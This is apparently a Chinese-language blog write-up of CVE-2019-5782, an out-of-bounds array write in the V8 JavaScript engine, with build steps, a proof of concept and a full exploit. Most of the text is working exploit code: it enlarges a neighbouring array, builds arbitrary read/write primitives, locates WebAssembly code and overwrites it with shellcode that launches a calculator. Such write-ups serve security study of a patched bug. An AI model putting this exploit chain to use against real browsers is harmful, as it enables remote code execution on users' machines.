cve-2019-5782

V8数组越界的洞,简单写下漏洞分析。

环境配置

1
2
3
4
git reset --hard b474b3102bd4a95eafcdb68e0e44656046132bc9
gclient sync
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug

poc

之前是参考https://gtoad.github.io/2019/09/01/V8-CVE-2019-5782/

来复现的。

漏洞详情见https://bugs.chromium.org/p/chromium/issues/detail?id=906043

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// Flags: --allow-natives-syntax
function fun(arg) {
  let x = arguments.length;
  a1 = new Array(0x10);
  a1[0] = 1.1;
  a2 = new Array(0x10);
  a2[0] = 1.1;
  a1[(x >> 16) * 21] = 1.39064994160909e-309;  // 0xffff00000000
  a1[(x >> 16) * 41] = 8.91238232205e-313;  // 0x2a00000000
}
var a1, a2;
var a3 = [1.1,2.2];
a3.length = 0x11000;
a3.fill(3.3);
var a4 = [1.1];
for (let i = 0; i < 10000; i++) fun(...a4);
// %OptimizeFunctionOnNextCall(fun);
fun(...a3);
for (i = 0; i < a2.length; i++){
    console.log(a2[i]);
}
console.log(a2.length);

可以发现输出后a2的length发生了改变

调试可以看在执行fun(…a3);前内存布局如下

a1 elements后跟着a1结构体然后是a2 elements

image-20220324180828823

fun(…a3);执行后如下

image-20220324181439088

可以看到a2的elements length和自身length被修改

再看看poc

1
2
a1[(x >> 16) * 21] = 1.39064994160909e-309;  // 0xffff00000000
a1[(x >> 16) * 41] = 8.91238232205e-313;  // 0x2a00000000

所以问题出在a1存在一个越界写,因为不能越界写a1的elements length只好在下面布局一个array然后使其长度增大进而实现任意地址读写。

exp

因为可以借助a1来扩大a2length来越界读写,利用也相对明了起来

和之前利用类似,先申请一个Array和f函数然后通过a2的越界读写来leak地址通过覆写array的backingstore来leak出f函数code地址然后再次覆写写入shellcode调用函数实现利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
function d2u(num1,num2){
  d = new Uint32Array(2);
  d[0] = num1;
  d[1] = num2;
  float = new Float64Array(d.buffer);
  return float[0];
}

String.prototype.padLeft =
Number.prototype.padLeft = function(total, pad) {
  return (Array(total).join(pad || 0) + this).slice(-total);
}

// Return the binary data represented by the given hexdecimal string.
function unhexlify(hexstr) {
  if (hexstr.length % 2 == 1)
      throw new TypeError("Invalid hex string");

  var bytes = new Uint8Array(hexstr.length / 2);
  for (var i = 0; i < hexstr.length; i += 2)
      bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);

  return bytes;
}

// Return the hexadecimal representation of the given byte array.
function hexlify(bytes) {
  var res = [];
  for (var i = 0; i < bytes.length; i++){
      //console.log(bytes[i].toString(16));
      res.push(('0' + bytes[i].toString(16)).substr(-2));
  }
  return res.join('');

}

function hexdump(data) {
  if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
      data = Array.from(data);

  var lines = [];
      var chunk = data.slice(i, i+16);
  for (var i = 0; i < data.length; i += 16) {
      var parts = chunk.map(hex);
      if (parts.length > 8)
          parts.splice(8, 0, ' ');
      lines.push(parts.join(' '));
  }

  return lines.join('\n');
}


// Simplified version of the similarly named python module.
var Struct = (function() {
  // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
  var buffer      = new ArrayBuffer(8);
  var byteView    = new Uint8Array(buffer);
  var uint32View  = new Uint32Array(buffer);
  var float64View = new Float64Array(buffer);

  return {
      pack: function(type, value) {
          var view = type;        // See below
          view[0] = value;
          return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
      },

      unpack: function(type, bytes) {
          if (bytes.length !== type.BYTES_PER_ELEMENT)
              throw Error("Invalid bytearray");

          var view = type;        // See below
          byteView.set(bytes);
          return view[0];
      },

      // Available types.
      int8:    byteView,
      int32:   uint32View,
      float64: float64View
  };
})();

function Int64(v) {
  // The underlying byte array.
  var bytes = new Uint8Array(8);

  switch (typeof v) {
      case 'number':
          v = '0x' + Math.floor(v).toString(16);
      case 'string':
          if (v.startsWith('0x'))
              v = v.substr(2);
          if (v.length % 2 == 1)
              v = '0' + v;

          var bigEndian = unhexlify(v, 8);
          //console.log(bigEndian.toString());
          bytes.set(Array.from(bigEndian).reverse());
          break;
      case 'object':
          if (v instanceof Int64) {
              bytes.set(v.bytes());
          } else {
              if (v.length != 8)
                  throw TypeError("Array must have excactly 8 elements.");
              bytes.set(v);
          }
          break;
      case 'undefined':
          break;
      default:
          throw TypeError("Int64 constructor requires an argument.");
  }

  // Return a double whith the same underlying bit representation.
  this.asDouble = function() {
      // Check for NaN
      if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
          throw new RangeError("Integer can not be represented by a double");

      return Struct.unpack(Struct.float64, bytes);
  };

  // Return a javascript value with the same underlying bit representation.
  // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
  // due to double conversion constraints.
  this.asJSValue = function() {
      if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
          throw new RangeError("Integer can not be represented by a JSValue");

      // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
      this.assignSub(this, 0x1000000000000);
      var res = Struct.unpack(Struct.float64, bytes);
      this.assignAdd(this, 0x1000000000000);

      return res;
  };

  // Return the underlying bytes of this number as array.
  this.bytes = function() {
      return Array.from(bytes);
  };

  // Return the byte at the given index.
  this.byteAt = function(i) {
      return bytes[i];
  };

  // Return the value of this number as unsigned hex string.
  this.toString = function() {
      //console.log("toString");
      return '0x' + hexlify(Array.from(bytes).reverse());
  };

  // Basic arithmetic.
  // These functions assign the result of the computation to their 'this' object.

  // Decorator for Int64 instance operations. Takes care
  // of converting arguments to Int64 instances if required.
  function operation(f, nargs) {
      return function() {
          if (arguments.length != nargs)
              throw Error("Not enough arguments for function " + f.name);
          for (var i = 0; i < arguments.length; i++)
              if (!(arguments[i] instanceof Int64))
                  arguments[i] = new Int64(arguments[i]);
          return f.apply(this, arguments);
      };
  }

  // this = -n (two's complement)
  this.assignNeg = operation(function neg(n) {
      for (var i = 0; i < 8; i++)
          bytes[i] = ~n.byteAt(i);

      return this.assignAdd(this, Int64.One);
  }, 1);

  // this = a + b
  this.assignAdd = operation(function add(a, b) {
      var carry = 0;
      for (var i = 0; i < 8; i++) {
          var cur = a.byteAt(i) + b.byteAt(i) + carry;
          carry = cur > 0xff | 0;
          bytes[i] = cur;
      }
      return this;
  }, 2);

  // this = a - b
  this.assignSub = operation(function sub(a, b) {
      var carry = 0;
      for (var i = 0; i < 8; i++) {
          var cur = a.byteAt(i) - b.byteAt(i) - carry;
          carry = cur < 0 | 0;
          bytes[i] = cur;
      }
      return this;
  }, 2);

  // this = a & b
  this.assignAnd = operation(function and(a, b) {
      for (var i = 0; i < 8; i++) {
          bytes[i] = a.byteAt(i) & b.byteAt(i);
      }
      return this;
  }, 2);
}

// Constructs a new Int64 instance with the same bit representation as the provided double.
Int64.fromDouble = function(d) {
  var bytes = Struct.pack(Struct.float64, d);
  return new Int64(bytes);
};

// Return -n (two's complement)
function Neg(n) {
  return (new Int64()).assignNeg(n);
}

// Return a + b
function Add(a, b) {
  return (new Int64()).assignAdd(a, b);
}

// Return a - b
function Sub(a, b) {
  return (new Int64()).assignSub(a, b);
}

// Return a & b
function And(a, b) {
  return (new Int64()).assignAnd(a, b);
}

function hex(a) {
  if (a == undefined) return "0xUNDEFINED";
  var ret = a.toString(16);
  if (ret.substr(0,2) != "0x") return "0x"+ret;
  else return ret;
}

function lower(x) {
  // returns the lower 32bit of double x
  return parseInt(("0000000000000000" + Int64.fromDouble(x).toString()).substr(-8,8),16) | 0;
}

function upper(x) {
  // returns the upper 32bit of double x
  return parseInt(("0000000000000000" + Int64.fromDouble(x).toString()).substr(-16, 8),16) | 0;
}


function lowerint(x) {
  // returns the lower 32bit of int x
  return parseInt(("0000000000000000" + x.toString(16)).substr(-8,8),16) | 0;
}

function upperint(x) {
  // returns the upper 32bit of int x
  return parseInt(("0000000000000000" + x.toString(16)).substr(-16, 8),16) | 0;
}

function combine(a, b) {
  //a = a >>> 0;
  //b = b >>> 0;
  //console.log(a.toString());
  //console.log(b.toString());
  return parseInt(Int64.fromDouble(b).toString() + Int64.fromDouble(a).toString(), 16);
}


//padLeft用于字符串左补位

function combineint(a, b) {
  //a = a >>> 0;
  //b = b >>> 0;
  return parseInt(b.toString(16).substr(-8,8) + (a.toString(16)).padLeft(8), 16);
}

function gc(){
for (var i = 0; i < 1024 * 1024 * 16; i++){
  new String();
}
}

function clear_space(){
gc();
gc();
}

function get_shell(){
  return 1+1;
}

function utf8ToString(h, p) {
  let s = "";
  for (i = p; h[i]; i++) {
    s += String.fromCharCode(h[i]);
  }
  return s;
}

//--------------------tools above---------------------------

var buffer = new Uint8Array([0,97,115,109,1,0,0,0,1,138,128,128,128,0,2,96,1,127,1,127,96,0,1,127,2,140,128,128,128,0,1,3,101,110,118,4,112,117,116,115,0,0,3,130,128,128,128,0,1,1,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,150,128,128,128,0,2,6,109,101,109,111,114,121,2,0,9,71,84,111,97,100,76,117,99,107,0,1,10,146,128,128,128,0,1,140,128,128,128,0,0,65,16,16,0,26,65,137,221,203,1,11,11,160,128,128,128,0,1,0,65,16,11,26,87,101,98,65,115,115,101,109,98,108,121,32,109,111,100,117,108,101,32,108,111,97,100,101,100,0
]);
var wasmImports = {
  env: {
    puts: function puts (index) {
      console.log(utf8ToString(h, index));
    }
  }
};
let m = new WebAssembly.Instance(new WebAssembly.Module(buffer),wasmImports);
let h = new Uint8Array(m.exports.memory.buffer);
let f = m.exports.GToadLuck;

f();
%SystemBreak();
var leak = f;

function fun(arg) {
  let x = arguments.length;
  a1 = new Array(0x10);
  a1[0] = 1.1;
  oob_double_Array = new Array(0x10);
  oob_double_Array[0] = 1.1;
  object_Array = new Array(0x10);
  object_Array[0] = {};
  object_Array[1] = leak;
  x = x >> 16
  a1[x*19] = 2.60750842793813e-310;//0x0000300000000000
  a1[x*21] = 2.60750842793813e-310;
  a1[x*41] = 2.60750842793813e-310;
}

var a1, oob_double_Array, object_Array,oob_buffer;
var a3 = [1.1, 2.2];
a3.length = 0x11000;
a3.fill(3.3);
var a4 = [1.1];
for(let i = 0; i < 10000; i++) fun(...a4);

console.log("GT1");
%DebugPrint(leak); // debug 0x325565da4511 0x325565da44d9
%DebugPrint(fun);
%SystemBreak();

fun(...a3);

console.log("GT2");
%DebugPrint(a1);
%DebugPrint(oob_double_Array); // debug 0x2a46939e779
%DebugPrint(object_Array);
f();
%SystemBreak();

function user_space_read(leak){
  object_Array[1] = leak;
  return oob_double_Array[23];
}

function writePtr(offset, address, value){
  oob_double_Array[offset] = address;
  fake_dv = new Float64Array(oob_buffer);
  fake_dv[0] = value;
}

function readPtr(offset, address){
  oob_double_Array[offset] = address;
  fake_dv = new Float64Array(oob_buffer);
  return fake_dv[0];
}

function_addr = oob_double_Array[23];
//console.log("[+] the f() function addr is at " + Int64.fromDouble(function_addr).toString());
oob_buffer = new ArrayBuffer(0x1000);

console.log("GT3");
%DebugPrint(oob_buffer); // debug 0x2a46939e891
f();
%SystemBreak();

oob_buffer_addr = user_space_read(oob_buffer);
//console.log("[+] ob_buffer addr is at " + Int64.fromDouble(oob_buffer_addr).toString());

oob_array_addr = user_space_read(oob_double_Array);
//console.log("[+] oob_double_Array addr is at " + Int64.fromDouble(oob_array_addr).toString());
temp1 = Int64.fromDouble(oob_buffer_addr + new Int64(0x1f).asDouble() - oob_array_addr + new Int64(0x81).asDouble());
offset = lowerint(temp1) / 8;
console.log(offset.toString());

console.log("GT4");
f();
%SystemBreak();

shared_info = readPtr(offset, function_addr + new Int64(0x17).asDouble());
console.log("[+] shared_info is at " + Int64.fromDouble(shared_info).toString());

wasm_exported_function_data = readPtr(offset, shared_info + new Int64(0x7).asDouble());
console.log("[+] wasm_exported_function_data is at " + Int64.fromDouble(wasm_exported_function_data).toString());

instance = readPtr(offset, wasm_exported_function_data + new Int64(0xf).asDouble());
console.log("[+] instance is at " + Int64.fromDouble(instance).toString());
//----------imported_function_targets is not double---------------
oob_double_Array[offset] = instance + new Int64(0xbf).asDouble(); //backing store
var ift_buffer = new Uint32Array(oob_buffer);
imported_function_targets = d2u(ift_buffer[0],ift_buffer[1]);
console.log(ift_buffer[0]);
console.log(ift_buffer[1]);

//imported_function_targets = readPtr(offset, instance + new Int64(0xc7).asDouble());
console.log("[+] imported_function_targets is at " + Int64.fromDouble(imported_function_targets).toString());

code_addr = readPtr(offset, imported_function_targets);
console.log("[+] code_addr is at " + Int64.fromDouble(code_addr).toString());

console.log("GT5");
console.log("[+] the f() code addr is at " + Int64.fromDouble(code_addr).toString());
f();
%SystemBreak();

oob_double_Array[offset] = code_addr; //backing store

var shellcode = new Uint32Array(oob_buffer);
shellcode[0] = 0x90909090;
shellcode[1] = 0x90909090;
shellcode[2] = 0x782fb848;
shellcode[3] = 0x636c6163;
shellcode[4] = 0x48500000;
shellcode[5] = 0x73752fb8;
shellcode[6] = 0x69622f72;
shellcode[7] = 0x8948506e;
shellcode[8] = 0xc03148e7;
shellcode[9] = 0x89485750;
shellcode[10] = 0xd23148e6;
shellcode[11] = 0x3ac0c748;
shellcode[12] = 0x50000030;
shellcode[13] = 0x4944b848;
shellcode[14] = 0x414c5053;
shellcode[15] = 0x48503d59;
shellcode[16] = 0x3148e289;
shellcode[17] = 0x485250c0;
shellcode[18] = 0xc748e289;
shellcode[19] = 0x00003bc0;
shellcode[20] = 0x050f00;

console.log("GT6");
%DebugPrint(f);
%SystemBreak();

f();

gt2达成长度扩展,oob_double_Array即a2

image-20220324215424596

object_Array就紧跟在oob_double_Array下方

下面看leak函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
function user_space_read(leak){
  object_Array[1] = leak;
  return oob_double_Array[23];
}

function writePtr(offset, address, value){
  oob_double_Array[offset] = address;
  fake_dv = new Float64Array(oob_buffer);
  fake_dv[0] = value;
}

function readPtr(offset, address){
  oob_double_Array[offset] = address;
  fake_dv = new Float64Array(oob_buffer);
  return fake_dv[0];
}

往object_Array[1]写值通过oob_double_Array[23]来leak

下面申请一个ArrayBuffer,因为ArrayBuffer偏移不定这边需要求个offset

1
2
3
4
5
6
7
8
oob_buffer_addr = user_space_read(oob_buffer);
//console.log("[+] ob_buffer addr is at " + Int64.fromDouble(oob_buffer_addr).toString());

oob_array_addr = user_space_read(oob_double_Array);
//console.log("[+] oob_double_Array addr is at " + Int64.fromDouble(oob_array_addr).toString());
temp1 = Int64.fromDouble(oob_buffer_addr + new Int64(0x1f).asDouble() - oob_array_addr + new Int64(0x81).asDouble());
offset = lowerint(temp1) / 8;
console.log(offset.toString());

通过leak俩地址然后计算偏移后除8即可计算出backingstore的index

接下去要leak出code地址,因为这边用的是wasm,不是jsfunction

先找偏移0x18 leak出shared_info然后通过偏移0x8 leak出wasm_exported_function_data然后是偏移0x10处leak出wasm instance地址,wasm instance偏移0xc0处就是code地址

//32位和64位不同,这边是64位下的偏移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
shared_info = readPtr(offset, function_addr + new Int64(0x17).asDouble());
console.log("[+] shared_info is at " + Int64.fromDouble(shared_info).toString());

wasm_exported_function_data = readPtr(offset, shared_info + new Int64(0x7).asDouble());
console.log("[+] wasm_exported_function_data is at " + Int64.fromDouble(wasm_exported_function_data).toString());

instance = readPtr(offset, wasm_exported_function_data + new Int64(0xf).asDouble());
console.log("[+] instance is at " + Int64.fromDouble(instance).toString());
//----------imported_function_targets is not double---------------
oob_double_Array[offset] = instance + new Int64(0xbf).asDouble(); //backing store
var ift_buffer = new Uint32Array(oob_buffer);
imported_function_targets = d2u(ift_buffer[0],ift_buffer[1]);
console.log(ift_buffer[0]);
console.log(ift_buffer[1]);

//imported_function_targets = readPtr(offset, instance + new Int64(0xc7).asDouble());
console.log("[+] imported_function_targets is at " + Int64.fromDouble(imported_function_targets).toString());

code_addr = readPtr(offset, imported_function_targets);
console.log("[+] code_addr is at " + Int64.fromDouble(code_addr).toString());

console.log("GT5");
console.log("[+] the f() code addr is at " + Int64.fromDouble(code_addr).toString());
f();
%SystemBreak();

最后就是把code地址写入backingstore然后覆写shellcode执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
oob_double_Array[offset] = code_addr; //backing store

var shellcode = new Uint32Array(oob_buffer);
shellcode[0] = 0x90909090;
shellcode[1] = 0x90909090;
shellcode[2] = 0x782fb848;
shellcode[3] = 0x636c6163;
shellcode[4] = 0x48500000;
shellcode[5] = 0x73752fb8;
shellcode[6] = 0x69622f72;
shellcode[7] = 0x8948506e;
shellcode[8] = 0xc03148e7;
shellcode[9] = 0x89485750;
shellcode[10] = 0xd23148e6;
shellcode[11] = 0x3ac0c748;
shellcode[12] = 0x50000030;
shellcode[13] = 0x4944b848;
shellcode[14] = 0x414c5053;
shellcode[15] = 0x48503d59;
shellcode[16] = 0x3148e289;
shellcode[17] = 0x485250c0;
shellcode[18] = 0xc748e289;
shellcode[19] = 0x00003bc0;
shellcode[20] = 0x050f00;

console.log("GT6");
%DebugPrint(f);
%SystemBreak();

f();

完美弹出计算器

#v8
cve-2019-5782
http://www.psbazx.com/2022/03/24/cve-2019-5782/
Beitragsautor
皮三宝
Veröffentlicht am
March 24, 2022
Urheberrechtshinweis